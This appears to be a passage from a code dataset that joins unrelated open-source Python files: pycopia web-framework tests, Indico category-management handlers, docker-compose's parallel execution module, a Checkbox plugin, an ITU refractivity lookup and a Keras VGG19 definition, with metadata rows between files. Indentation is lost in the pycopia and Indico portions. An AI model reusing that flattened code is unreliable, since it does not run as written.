}, name="useenums") ; f.append(BR)
f.add_select(["mone", "mtwo", ("mthree", True), ("mfour", True)], name="multiselect", multiple=True) ; f.append(BR)
set = f.add_fieldset("afieldset")
set.add_textinput(name="settext", label="Enter set text")
set.add_textinput(name="settext2", label="Enter set text 2", default="Default text.")
set.append(BR)
tbl = htd.new_table([1,2,3,4,5],
[NULL, NULL, NULL],
["col1", "col2", "col3"], width="100%", summary="autogenerated")
gentable = table.GenericTable(["heading1", "heading2", "heading3"],
title="Sample generic table")
gentable.append([1,2,3])
gentable.append([4,5,6])
tbl2 = htd.new_table_from_GenericTable(gentable)
# object
subdoc = XHTML.new_document(dtds.XHTML)
parts = subdoc.creator(("Add a document object.", ["Some data.", "some more data.."]))
subdoc.append(parts)
sdfo = open("/tmp/subdoc.html", "w")
subdoc.emit(sdfo)
sdfo.close()
htd.add_object(data="subdoc.html", type=subdoc.MIMETYPE,
width="400px", height="600px")
htd.emit(sys.stdout)
print "-----"
fo = open(XHTMLFILENAME, "w")
bw = POM.BeautifulWriter(fo, XHTML.INLINE)
htd.emit(bw)
fo.close()
print "----- Form values:"
print f.fetch_form_values()
print "----- Form elements:"
felems = f.fetch_form_elements()
for name, elemlist in felems.items():
print repr(name), ": ", repr(elemlist)
print
# visually verify the page.
webbrowser.open("file://%s" % (XHTMLFILENAME,))
def test_requesthandler(self):
class MyHandler(framework.RequestHandler):
def get(self, request):
pass
h = MyHandler(framework.default_doc_constructor)
print h._implemented
def test_urlmap(self):
def F(r):
pass
m = framework.URLMap(r'^/selftest/(?P<patt1>\S+)/(?P<patt2>\d+)/$', F)
path = m.get_url(patt1="part1", patt2="22")
print m
print path
self.assertEqual(path, "/selftest/part1/22/")
self.assertTrue( m.match(path))
def test_Zfetch(self):
doc = XHTML.get_document("http://www.pycopia.net/")
self.assertEqual(doc.title.get_text(), "Python Application Frameworks")
# write it out for inspection
# Note that the document was parsed, and regenerated.
fo = open("/tmp/pycopia_net.html", "w")
try:
doc.emit(fo)
finally:
fo.close()
print "Fetched document found here: /tmp/pycopia_net.html"
def test_Zfetchmobile(self):
doc = XHTML.get_document(
"http://www.google.com/gwt/n?u=http://www.pynms.net",
mimetype=WML,
useragent=MOBILEAGENT2)
print "Mobile doctype:", doc.DOCTYPE
# write it out for inspection
# Note that the document was parsed, and regenerated.
fo = open("/tmp/test_WWW_mobile.html", "w")
try:
doc.emit(fo)
finally:
fo.close()
print "Fetched document found here: /tmp/test_WWW_mobile.html"
# fetches a chinese, transcoded WML page.
# XXX currently broken due to bad markup returned.
# def test_Zfetchwml(self):
# doc = XHTML.get_document(
# "http://www.google.cn/gwt/n?mrestrict=wml&site=search&q=NBA&source=m&output=wml&hl=zh-CN&ei=b99bRpDLAZzOogK1_Pwq&ct=res&cd=0&rd=1&u=http%3A%2F%2Fchina.nba.com%2F",
# mimetype=WML,
# useragent=MOBILEAGENT2)
# print "WML doctype:", doc.DOCTYPE
# self.assert_(type(doc) is XHTML.XHTMLDocument)
# self.assert_(str(doc.DOCTYPE).find("Mobile") > 0)
# # write it out for inspection
# # Note that the document was parsed, and regenerated.
# fo = open("/tmp/test_WWW_wml.html", "w")
# try:
# doc.emit(fo)
# finally:
# fo.close()
# print "Fetched document found here: /tmp/test_WWW_wml.html"
    def test_rst(self):
renderer = rst.Renderer()
text = """
Heading
=======
Some Text.
"""
print renderer.render(text)
def test_JSONcodec(self):
data = [{"data": "test"}, 1]
enc = json.GetJSONEncoder()
dec = json.GetJSONDecoder()
self.assertEqual( dec.decode(enc.encode(data)), data)
def test_JSONhandler(self):
disp = json.JSONDispatcher([_JsonTest])
env = GetMockEnviron(disp)
req = framework.HTTPRequest(env)
response = disp(req, "_JsonTest")
self.assert_(isinstance(response, framework.HttpResponse))
self.assertEqual(response.headers["Content-Type"].value, "application/json")
content = simplejson.loads(response.content)
self.assertEqual(content, 1)
def GetMockEnviron(handler):
environ = {}
environ['REQUEST_METHOD'] = "POST"
environ['PATH_INFO'] = "/proxy/_JsonTest"
m = framework.URLMap(r'^/proxy/(?P<methodname>\w+)/$', handler)
environ["framework.get_url"] = m.get_url
q = 'data=%5B%22_JsonTest%22%2C+1%5D' # as PythonProxy would send a call from proxy._JsonTest(1)
inp = StringIO(q)
environ["CONTENT_TYPE"] = "application/x-www-form-urlencoded"
environ["CONTENT_LENGTH"] = len(q)
environ["wsgi.input"] = inp
environ["wsgi.errors"] = sys.stderr
return environ
if __name__ == '__main__':
unittest.main()
| apache-2.0 | -7,756,537,204,763,291,000 | 36.611486 | 172 | 0.590317 | false |
belokop/indico_bare | indico/MaKaC/webinterface/rh/categoryMod.py | 1 | 16874 | # This file is part of Indico.
# Copyright (C) 2002 - 2016 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from flask import request
import tempfile
import MaKaC.webinterface.locators as locators
import MaKaC.webinterface.urlHandlers as urlHandlers
import MaKaC.webinterface.pages.category as category
from MaKaC.webinterface.user import UserListModificationBase
from indico.core.config import Config
from MaKaC.common.utils import validMail
from MaKaC.webinterface.rh.base import RHModificationBaseProtected
from MaKaC.errors import MaKaCError, FormValuesError, NotFoundError
import MaKaC.conference as conference
from indico.modules.users.legacy import AvatarUserWrapper
from indico.modules.groups.legacy import GroupWrapper
from indico.util.i18n import _
class RHCategModifBase( RHModificationBaseProtected ):
def _checkProtection(self):
if self._target.canModify( self.getAW() ):
RHModificationBaseProtected._checkProtection(self)
return
else:
self._doProcess = False
self._redirect(urlHandlers.UHCategoryDisplay.getURL(self._target))
def _checkParams(self, params):
l = locators.CategoryWebLocator(params)
self._target = l.getObject()
if self._target is None:
raise NotFoundError(_("The category with id '{}' does not exist or has been deleted").format(
params["categId"]),
title=_("Category not found"))
class RHCategoryModification(RHCategModifBase):
_uh = urlHandlers.UHCategoryModification
def _process(self):
p = category.WPCategoryModification(self, self._target)
return p.display()
class RHCategoryDataModif( RHCategModifBase ):
_uh = urlHandlers.UHCategoryDataModif
def _process( self ):
p = category.WPCategoryDataModification( self, self._target )
return p.display()
class RHCategoryPerformModification( RHCategModifBase ):
_uh = urlHandlers.UHCategoryPerformModification
def _checkParams(self, params):
RHCategModifBase._checkParams(self, params)
if params.get("name", "").strip() =="":
raise FormValuesError("Please, provide a name for the new subcategory")
def _getNewTempFile( self ):
cfg = Config.getInstance()
tempPath = cfg.getUploadedFilesTempDir()
tempFileName = tempfile.mkstemp( suffix="Indico.tmp", dir = tempPath )[1]
return tempFileName
def _saveFileToTemp(self, fs):
fileName = self._getNewTempFile()
fs.save(fileName)
return fileName
def _process( self):
params = self._getRequestParams()
if not "cancel" in params:
if (params.get("subcats","")):
subcat=True
else:
subcat=False
if (params.get("modifyConfTZ","")):
modifyConfTZ=True
else:
modifyConfTZ=False
tz = params.get("defaultTimezone", "UTC")
self._target.setTimezone( tz )
if modifyConfTZ:
self._target.changeConfTimezones( tz )
if params.get("name", "") != self._target.getName():
self._target.setName( params.get("name", "") )
self._target.setDescription( params.get("description", "") )
self._target.setDefaultStyle("simple_event",params.get("defaultSimpleEventStyle", ""),subcat )
self._target.setDefaultStyle("meeting",params.get("defaultMeetingStyle", ""),subcat)
if self._target.getVisibility() != int(params.get("visibility",999)):
self._target.setVisibility(params.get("visibility",999))
if self._getUser().isAdmin():
self._target.setSuggestionsDisabled('disableSuggestions' in request.form)
if "delete" in params and self._target.getIcon() is not None:
self._target.removeIcon()
if "icon" in params and type(params["icon"]) != str and \
params["icon"].filename.strip() != "":
if not hasattr(self, "_filePath"):
# do not save the file again if it has already been done (db conflicts)
self._filePath = self._saveFileToTemp(params["icon"])
self._tempFilesToDelete.append(self._filePath)
self._fileName = params["icon"].filename
f = conference.LocalFile()
f.setName( "Icon" )
f.setDescription( "This is the icon for the category" )
f.setFileName( self._fileName )
f.setFilePath( self._filePath )
self._target.setIcon( f )
self._redirect( urlHandlers.UHCategoryModification.getURL( self._target ) )
class RHCategoryAC( RHCategModifBase ):
_uh = urlHandlers.UHCategModifAC
def _process( self ):
p = category.WPCategModifAC( self, self._target )
return p.display()
class RHCategoryTools( RHCategModifBase ):
_uh = urlHandlers.UHCategModifTools
def _process( self ):
p = category.WPCategModifTools( self, self._target )
return p.display()
class RHCategoryCreation( RHCategModifBase ):
_uh = urlHandlers.UHCategoryCreation
def _process( self ):
p = category.WPCategoryCreation( self, self._target )
return p.display()
class RHCategoryPerformCreation( RHCategModifBase ):
_uh = urlHandlers.UHCategoryPerformCreation
def _checkParams(self, params):
RHCategModifBase._checkParams(self, params)
if params.get("name", "").strip() =="" and not ("cancel" in params):
raise FormValuesError("Please, provide a name for the new subcategory")
def _process( self ):
params = self._getRequestParams()
if not ("cancel" in params):
categAccessProtection = params.get("categProtection", "inherit")
if categAccessProtection == "private" :
protection = 1
elif categAccessProtection == "public" :
protection = -1
else:
protection = 0
nc = self._target.newSubCategory(protection)
nc.setTimezone( params.get("defaultTimezone"))
nc.setName( params.get("name", "") )
nc.setDescription( params.get("description", "") )
nc.setDefaultStyle("simple_event",params.get("defaultSimpleEventStyle", "") )
nc.setDefaultStyle("meeting",params.get("defaultMeetingStyle", "") )
if protection == 1:
allowedUsers = self._getAllowedUsers(params)
if allowedUsers :
for person in allowedUsers :
if isinstance(person, (AvatarUserWrapper, GroupWrapper)):
nc.grantAccess(person)
self._redirect( urlHandlers.UHCategoryModification.getURL( self._target ) )
def _getAllowedUsers(self, params):
auAvatars = []
from MaKaC.services.interface.rpc import json
allowedUsersDict = json.decode(params.get("allowedUsers"))
if allowedUsersDict :
auAvatars, auNewUsers, auEditedAvatars = UserListModificationBase.retrieveUsers({"allowedUserList":allowedUsersDict}, "allowedUserList")
return auAvatars
class _ActionSubCategDeletion:
def __init__( self, rh, target, selCategs ):
self._rh = rh
self._target = target
self._categs = selCategs
def askConfirmation( self, params ):
p = category.WPSubCategoryDeletion( self._rh, self._target )
return p.display( subCategs=self._categs )
def perform( self ):
for categ in self._categs:
for manager in categ.getManagerList():
categ.revokeModification(manager)
categ.delete()
class _ActionSortCategories:
def __init__( self, rh ):
self._rh = rh
def askConfirmation( self, params ):
return ""
def perform(self):
cl = self._rh._target.getSubCategoryList()
cl.sort(key=lambda c: c.getTitle().lower())
for categ in cl:
categ.setOrder(cl.index(categ))
class _ActionSubCategMove:
def __init__( self, rh, newpos, oldpos ):
self._rh = rh
self._newpos = int(newpos)
self._oldpos = int(oldpos)
def askConfirmation( self, params ):
return ""
def perform(self):
cl = self._rh._target.getSubCategoryList()
order = 0
movedcateg = cl[self._oldpos]
del cl[self._oldpos]
cl.insert(self._newpos,movedcateg)
for categ in cl:
categ.setOrder(cl.index(categ))
class _ActionSubCategReallocation:
def __init__( self, rh, target, selCategs ):
self._rh = rh
self._target = target
self._categs = selCategs
def askConfirmation( self, params ):
p = category.WPCategoryReallocation( self._rh, self._target )
params["subCategs"] = self._categs
return p.display( **params )
def perform( self ):
#check if the current user has modification privileges on the
# destination category
if not self._target.canModify( self._rh.getAW() ):
raise MaKaCError( _("cannot reallocate selected categoried to the selected destination because you are not authorised to modify the destination category"))
for categ in self._categs:
categ.move( self._target )
class RHCategoryActionSubCategs( RHCategModifBase ):
_uh = urlHandlers.UHCategoryActionSubCategs
def _checkParams( self, params ):
RHCategModifBase._checkParams( self, params )
categIdList = self._normaliseListParam(params.get("selectedCateg", []))
self._categs = []
self._confirmation = params.has_key("confirm")
if "cancel" in params:
return
cm = conference.CategoryManager()
for categId in categIdList:
self._categs.append( cm.getById( categId ) )
self._action = _ActionSubCategDeletion( self, self._target, self._categs )
if params.has_key("reallocate"):
self._action = _ActionSubCategReallocation( self, self._target, self._categs )
if params.has_key("oldpos") and params["oldpos"]!='':
self._confirmation = 1
self._action = _ActionSubCategMove( self, params['newpos'+params['oldpos']], params['oldpos'] )
if params.has_key("sort"):
self._confirmation = 1
self._action = _ActionSortCategories( self )
def _process( self ):
if not self._categs:
if self._confirmation:
#Move category
self._action.perform()
else:
if self._confirmation:
#remove, reallocate
self._action.perform()
else:
return self._action.askConfirmation(self._getRequestParams())
self._redirect(urlHandlers.UHCategoryModification.getURL(self._target))
class _ActionConferenceDeletion:
def __init__(self, rh, target, selConfs):
self._rh = rh
self._target = target
self._confs = selConfs
def perform(self, confs):
for event in confs:
event.delete()
def askConfirmation(self, params):
p = category.WPConferenceDeletion(self._rh, self._target)
return p.display(events=self._confs)
class _ActionConferenceReallocation:
def __init__( self, rh, srcCateg, selConfs, target):
self._rh = rh
self._categ = srcCateg
self._confs = selConfs
self._target=target
def askConfirmation( self, params ):
p = category.WPConferenceReallocation( self._rh, self._categ )
params["confs"] = self._confs
return p.display( **params )
def perform(self, confs):
# TODO: check if the current user can create conferences on the destination category
if not self._confs:
self._confs = confs
for conf in self._confs:
if self._categ == conf.getOwner():
self._categ.moveConference(conf, self._target)
class RHCategoryActionConferences(RHCategModifBase):
_uh = urlHandlers.UHCategoryActionConferences
def _checkParams( self, params ):
RHCategModifBase._checkParams( self, params )
confIdList = self._normaliseListParam(params.get("selectedConf", []))
self._confs = []
self._confirmation = params.has_key("confirm")
if "cancel" in params:
return
ch = conference.ConferenceHolder()
for confId in confIdList:
self._confs.append( ch.getById( confId ) )
self._action = _ActionConferenceDeletion( self, self._target, self._confs, )
if params.has_key("reallocate"):
self._srcCateg = self._target
if self._confirmation:
cm = conference.CategoryManager()
self._srcCateg = cm.getById( params["srcCategId"] )
self._action = _ActionConferenceReallocation( self, self._srcCateg, self._confs, self._target )
def _process( self ):
if self._confirmation:
self._action.perform(self._confs)
self._redirect( urlHandlers.UHCategoryModification.getURL( self._target ) )
if not self._confs:
self._redirect( urlHandlers.UHCategoryModification.getURL( self._target ) )
else:
return self._action.askConfirmation( self._getRequestParams() )
class RHCategorySetVisibility( RHCategModifBase ):
_uh = urlHandlers.UHCategorySetVisibility
def _process( self ):
params = self._getRequestParams()
if params.has_key("changeToPrivate"):
self._target.setProtection( 1 )
elif params.has_key("changeToInheriting"):
self._target.setProtection( 0 )
elif params.has_key("changeToPublic"):
# The 'Home' category is handled as a special case.
# We maintain the illusion for the user of it being either
# private or public, but actually it can be either private
# or inheriting for legacy reasons.
if params["type"] == "Home":
self._target.setProtection( 0 )
else :
self._target.setProtection( -1 )
self._redirect( urlHandlers.UHCategModifAC.getURL( self._target ) )
class RHCategorySetConfControl( RHCategModifBase ):
_uh = urlHandlers.UHCategorySetConfCreationControl
def _process( self ):
params = self._getRequestParams()
if "RESTRICT" in self._getRequestParams():
self._target.restrictConferenceCreation()
else:
self._target.allowConferenceCreation()
self._redirect( urlHandlers.UHCategModifAC.getURL( self._target ) )
class RHCategorySetNotifyCreation( RHCategModifBase ):
_uh = urlHandlers.UHCategorySetNotifyCreation
def _checkParams(self, params):
RHCategModifBase._checkParams(self, params)
self._emailList = params.get("notifyCreationList","")
if self._emailList.strip() != "" and not validMail(self._emailList):
raise FormValuesError(_("The email list contains invalid e-mail addresses or invalid separator"))
def _process( self ):
self._target.setNotifyCreationList(self._emailList)
self._redirect( urlHandlers.UHCategModifAC.getURL( self._target ) )
class RHCategoryDeletion(RHCategModifBase):
_uh = urlHandlers.UHCategoryDeletion
def _checkParams( self, params ):
RHCategModifBase._checkParams( self, params )
self._cancel = False
if "cancel" in params:
self._cancel = True
self._confirmation = params.has_key("confirm")
def _perform( self ):
self._target.delete(1)
def _process( self ):
if self._cancel:
self._redirect( urlHandlers.UHCategModifTools.getURL( self._target ) )
elif self._confirmation:
owner = self._target.getOwner()
self._perform()
self._redirect(urlHandlers.UHCategoryModification.getURL(owner))
else:
p = category.WPCategoryDeletion(self, self._target)
return p.display()
| gpl-3.0 | -1,614,652,444,537,777,400 | 36.004386 | 167 | 0.627 | false |
funkyfuture/docker-compose | compose/parallel.py | 1 | 10546 | from __future__ import absolute_import
from __future__ import unicode_literals
import logging
import operator
import sys
from threading import Lock
from threading import Semaphore
from threading import Thread
from docker.errors import APIError
from docker.errors import ImageNotFound
from six.moves import _thread as thread
from six.moves.queue import Empty
from six.moves.queue import Queue
from compose.cli.colors import green
from compose.cli.colors import red
from compose.cli.signals import ShutdownException
from compose.const import PARALLEL_LIMIT
from compose.errors import HealthCheckFailed
from compose.errors import NoHealthCheckConfigured
from compose.errors import OperationFailedError
from compose.utils import get_output_stream
log = logging.getLogger(__name__)
STOP = object()
class GlobalLimit(object):
"""Simple class to hold a global semaphore limiter for a project. This class
should be treated as a singleton that is instantiated when the project is.
"""
global_limiter = Semaphore(PARALLEL_LIMIT)
@classmethod
def set_global_limit(cls, value):
if value is None:
value = PARALLEL_LIMIT
cls.global_limiter = Semaphore(value)
def parallel_execute_watch(events, writer, errors, results, msg, get_name):
""" Watch events from a parallel execution, update status and fill errors and results.
Returns exception to re-raise.
"""
error_to_reraise = None
for obj, result, exception in events:
if exception is None:
writer.write(msg, get_name(obj), 'done', green)
results.append(result)
elif isinstance(exception, ImageNotFound):
# This is to bubble up ImageNotFound exceptions to the client so we
# can prompt the user if they want to rebuild.
errors[get_name(obj)] = exception.explanation
writer.write(msg, get_name(obj), 'error', red)
error_to_reraise = exception
elif isinstance(exception, APIError):
errors[get_name(obj)] = exception.explanation
writer.write(msg, get_name(obj), 'error', red)
elif isinstance(exception, (OperationFailedError, HealthCheckFailed, NoHealthCheckConfigured)):
errors[get_name(obj)] = exception.msg
writer.write(msg, get_name(obj), 'error', red)
elif isinstance(exception, UpstreamError):
writer.write(msg, get_name(obj), 'error', red)
else:
errors[get_name(obj)] = exception
error_to_reraise = exception
return error_to_reraise
def parallel_execute(objects, func, get_name, msg, get_deps=None, limit=None):
"""Runs func on objects in parallel while ensuring that func is
ran on object only after it is ran on all its dependencies.
get_deps called on object must return a collection with its dependencies.
get_name called on object must return its name.
"""
objects = list(objects)
stream = get_output_stream(sys.stderr)
if ParallelStreamWriter.instance:
writer = ParallelStreamWriter.instance
else:
writer = ParallelStreamWriter(stream)
for obj in objects:
writer.add_object(msg, get_name(obj))
for obj in objects:
writer.write_initial(msg, get_name(obj))
events = parallel_execute_iter(objects, func, get_deps, limit)
errors = {}
results = []
error_to_reraise = parallel_execute_watch(events, writer, errors, results, msg, get_name)
for obj_name, error in errors.items():
stream.write("\nERROR: for {} {}\n".format(obj_name, error))
if error_to_reraise:
raise error_to_reraise
return results, errors
def _no_deps(x):
return []
class State(object):
"""
Holds the state of a partially-complete parallel operation.
state.started: objects being processed
state.finished: objects which have been processed
state.failed: objects which either failed or whose dependencies failed
"""
def __init__(self, objects):
self.objects = objects
self.started = set()
self.finished = set()
self.failed = set()
def is_done(self):
return len(self.finished) + len(self.failed) >= len(self.objects)
def pending(self):
return set(self.objects) - self.started - self.finished - self.failed
class NoLimit(object):
def __enter__(self):
pass
def __exit__(self, *ex):
pass
def parallel_execute_iter(objects, func, get_deps, limit):
"""
Runs func on objects in parallel while ensuring that func is
ran on object only after it is ran on all its dependencies.
Returns an iterator of tuples which look like:
# if func returned normally when run on object
(object, result, None)
# if func raised an exception when run on object
(object, None, exception)
# if func raised an exception when run on one of object's dependencies
(object, None, UpstreamError())
"""
if get_deps is None:
get_deps = _no_deps
if limit is None:
limiter = NoLimit()
else:
limiter = Semaphore(limit)
results = Queue()
state = State(objects)
while True:
feed_queue(objects, func, get_deps, results, state, limiter)
try:
event = results.get(timeout=0.1)
except Empty:
continue
# See https://github.com/docker/compose/issues/189
except thread.error:
raise ShutdownException()
if event is STOP:
break
obj, _, exception = event
if exception is None:
log.debug('Finished processing: {}'.format(obj))
state.finished.add(obj)
else:
log.debug('Failed: {}'.format(obj))
state.failed.add(obj)
yield event
def producer(obj, func, results, limiter):
"""
The entry point for a producer thread which runs func on a single object.
Places a tuple on the results queue once func has either returned or raised.
"""
with limiter, GlobalLimit.global_limiter:
try:
result = func(obj)
results.put((obj, result, None))
except Exception as e:
results.put((obj, None, e))
def feed_queue(objects, func, get_deps, results, state, limiter):
"""
Starts producer threads for any objects which are ready to be processed
(i.e. they have no dependencies which haven't been successfully processed).
Shortcuts any objects whose dependencies have failed and places an
(object, None, UpstreamError()) tuple on the results queue.
"""
pending = state.pending()
log.debug('Pending: {}'.format(pending))
for obj in pending:
deps = get_deps(obj)
try:
if any(dep[0] in state.failed for dep in deps):
log.debug('{} has upstream errors - not processing'.format(obj))
results.put((obj, None, UpstreamError()))
state.failed.add(obj)
elif all(
dep not in objects or (
dep in state.finished and (not ready_check or ready_check(dep))
) for dep, ready_check in deps
):
log.debug('Starting producer thread for {}'.format(obj))
t = Thread(target=producer, args=(obj, func, results, limiter))
t.daemon = True
t.start()
state.started.add(obj)
except (HealthCheckFailed, NoHealthCheckConfigured) as e:
log.debug(
'Healthcheck for service(s) upstream of {} failed - '
'not processing'.format(obj)
)
results.put((obj, None, e))
if state.is_done():
results.put(STOP)
class UpstreamError(Exception):
pass
class ParallelStreamWriter(object):
"""Write out messages for operations happening in parallel.
Each operation has its own line, and ANSI code characters are used
to jump to the correct line, and write over the line.
"""
noansi = False
lock = Lock()
instance = None
@classmethod
def set_noansi(cls, value=True):
cls.noansi = value
def __init__(self, stream):
self.stream = stream
self.lines = []
self.width = 0
ParallelStreamWriter.instance = self
def add_object(self, msg, obj_index):
if msg is None:
return
self.lines.append(msg + obj_index)
self.width = max(self.width, len(msg + ' ' + obj_index))
def write_initial(self, msg, obj_index):
if msg is None:
return
self.stream.write("{:<{width}} ... \r\n".format(
msg + ' ' + obj_index, width=self.width))
self.stream.flush()
def _write_ansi(self, msg, obj_index, status):
self.lock.acquire()
position = self.lines.index(msg + obj_index)
diff = len(self.lines) - position
# move up
self.stream.write("%c[%dA" % (27, diff))
# erase
self.stream.write("%c[2K\r" % 27)
self.stream.write("{:<{width}} ... {}\r".format(msg + ' ' + obj_index,
status, width=self.width))
# move back down
self.stream.write("%c[%dB" % (27, diff))
self.stream.flush()
self.lock.release()
def _write_noansi(self, msg, obj_index, status):
self.stream.write("{:<{width}} ... {}\r\n".format(msg + ' ' + obj_index,
status, width=self.width))
self.stream.flush()
def write(self, msg, obj_index, status, color_func):
if msg is None:
return
if self.noansi:
self._write_noansi(msg, obj_index, status)
else:
self._write_ansi(msg, obj_index, color_func(status))
def parallel_operation(containers, operation, options, message):
parallel_execute(
containers,
operator.methodcaller(operation, **options),
operator.attrgetter('name'),
message,
)
def parallel_remove(containers, options):
stopped_containers = [c for c in containers if not c.is_running]
parallel_operation(stopped_containers, 'remove', options, 'Removing')
def parallel_pause(containers, options):
parallel_operation(containers, 'pause', options, 'Pausing')
def parallel_unpause(containers, options):
parallel_operation(containers, 'unpause', options, 'Unpausing')
def parallel_kill(containers, options):
parallel_operation(containers, 'kill', options, 'Killing')
| apache-2.0 | -6,830,198,598,084,363,000 | 30.201183 | 103 | 0.626399 | false |
Alberto-Beralix/Beralix | i386-squashfs-root/usr/share/checkbox/plugins/remote_suite.py | 1 | 1664 | #
# This file is part of Checkbox.
#
# Copyright 2008 Canonical Ltd.
#
# Checkbox is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Checkbox is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Checkbox. If not, see <http://www.gnu.org/licenses/>.
#
from checkbox.plugin import Plugin
class RemoteSuite(Plugin):
def register(self, manager):
super(RemoteSuite, self).register(manager)
for (rt, rh) in [
("prompt-remote", self.prompt_remote),
("report-remote", self.report_remote)]:
self._manager.reactor.call_on(rt, rh)
def prompt_remote(self, interface, suite):
self._manager.reactor.fire("prompt-suite", interface, suite)
# Register temporary handler for report-message events
def report_message(message):
message["suite"] = suite["name"]
self._manager.reactor.fire("report-job", message)
event_id = self._manager.reactor.call_on("report-message", report_message)
self._manager.reactor.fire("message-exec", suite)
self._manager.reactor.cancel_call(event_id)
def report_remote(self, suite):
self._manager.reactor.fire("report-suite", suite)
factory = RemoteSuite
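# Example: a rough sketch of the event flow this plugin takes part in, assuming
# a Checkbox plugin manager whose reactor fires the events handled above; the
# calling code shown here is illustrative.
#
#     manager.reactor.fire("prompt-remote", interface, suite)
#     # prompt_remote() then fires "prompt-suite" and "message-exec", while a
#     # temporary "report-message" handler tags each message with the suite
#     # name and re-emits it as "report-job".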
| gpl-3.0 | 1,768,032,259,811,580,400 | 33.666667 | 82 | 0.688702 | false |
Wireless-Innovation-Forum/Spectrum-Access-System | src/harness/reference_models/geo/refractivity.py | 1 | 3789 | # Copyright 2017 SAS Project Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Returns the ITU surface refractivity for a specified lat/lon.
Standalone execution:
python refractivity.py lat lng
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import math
import os
import sys
import numpy as np
from reference_models.geo import CONFIG
class RefractivityIndexer:
"""RefractivityIndexer class to retrieve refractivity for given world location.
  It retrieves the nearest four refractivity points from the ITU data file
  (1.5 degree grid), and interpolates bilinearly between those points.
Typical usage:
refractor = RefractivityIndexer()
r = refractor.Refractivity(19.66, -155.55)
"""
def __init__(self, datafile_or_dir=None):
self.ConfigureDataFile(datafile_or_dir, do_load=False)
self._num_lat_rows = 121 # Number of latitude rows in the data file
self._num_lon_cols = 241 # Number of longitude columns in the data file
self._lat_start = 90.0 # Latitude corresponding to first row of file (deg)
self._lon_start = 0.0 # Longitude corresponding to first column of file (deg)
self._delta_lat = self._delta_lon = 1.5 # Spacing between lat/lon rows/columns (deg)
def ConfigureDataFile(self, datafile_or_dir, do_load=True):
"""Configure the refractivity data file.
Inputs:
datafile_or_dir: the data path or directory.
If directory, then the datafile is the standard 'n050.txt'.
If None, then use the standard database location from CONFIG.py.
do_load: if set (default), load the data, otherwise do lazy loading.
"""
self._datafile = datafile_or_dir
if self._datafile is None:
self._datafile = os.path.join(CONFIG.GetItuDir(), 'n050.txt')
elif os.path.isdir(self._datafile):
self._datafile = os.path.join(self._datafile, 'n050.txt')
self._data = None
if do_load:
self._data = np.loadtxt(self._datafile)
def Refractivity(self, lat, lon):
"""Returns ITU refractivity for the specified lat/lon.
Inputs:
lat, lon : the coordinates of a point.
Returns:
the sea level refractivity on that point.
"""
if self._data is None:
self._data = np.loadtxt(self._datafile)
logging.info('Loaded refractivity data from %s' % self._datafile)
if lon < 0:
lon = lon + 360.0
row = (self._lat_start - lat) / self._delta_lat
col = (lon - self._lon_start) / self._delta_lon
# Bilinear interpolation on values
irow = int(math.floor(row))
icol = int(math.floor(col))
r00 = self._data[irow, icol]
r11 = self._data[irow+1, icol+1]
r01 = self._data[irow, icol+1]
r10 = self._data[irow+1, icol]
alpha_r, alpha_c = row - irow, col - icol
refractivity = ( r11 * alpha_r * alpha_c +
r00 * (1-alpha_r) * (1-alpha_c) +
r01 * (1-alpha_r) * alpha_c +
r10 * alpha_r * (1-alpha_c) )
return refractivity
if __name__ == '__main__':
indx = RefractivityIndexer()
r = indx.Refractivity(float(sys.argv[1]), float(sys.argv[2]))
print('Surface Refractivity (n-units) = %s' % r)
| apache-2.0 | -7,794,711,748,730,794,000 | 33.445455 | 89 | 0.666139 | false |
whoisever/vgg16_finetune_mutli_label | vgg19.py | 1 | 4374 | # -*- coding: utf-8 -*-
from keras.models import Sequential
from keras.optimizers import SGD
from keras.layers import Input, Dense, Convolution2D, MaxPooling2D, AveragePooling2D, ZeroPadding2D, Dropout, Flatten, merge, Reshape, Activation
from sklearn.metrics import log_loss
from load_cifar10 import load_cifar10_data
def vgg19_model(img_rows, img_cols, channel=1, num_classes=None):
"""
VGG 19 Model for Keras
Model Schema is based on
https://gist.github.com/baraldilorenzo/8d096f48a1be4a2d660d
ImageNet Pretrained Weights
https://drive.google.com/file/d/0Bz7KyqmuGsilZ2RVeVhKY0FyRmc/view?usp=sharing
Parameters:
img_rows, img_cols - resolution of inputs
channel - 1 for grayscale, 3 for color
num_classes - number of class labels for our classification task
"""
model = Sequential()
model.add(ZeroPadding2D((1,1),input_shape=(channel, img_rows, img_cols)))
model.add(Convolution2D(64, 3, 3, activation='relu'))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(64, 3, 3, activation='relu'))
model.add(MaxPooling2D((2,2), strides=(2,2)))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(128, 3, 3, activation='relu'))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(128, 3, 3, activation='relu'))
model.add(MaxPooling2D((2,2), strides=(2,2)))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(256, 3, 3, activation='relu'))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(256, 3, 3, activation='relu'))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(256, 3, 3, activation='relu'))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(256, 3, 3, activation='relu'))
model.add(MaxPooling2D((2,2), strides=(2,2)))
model.add(ZeroPadding2D((1,1)))
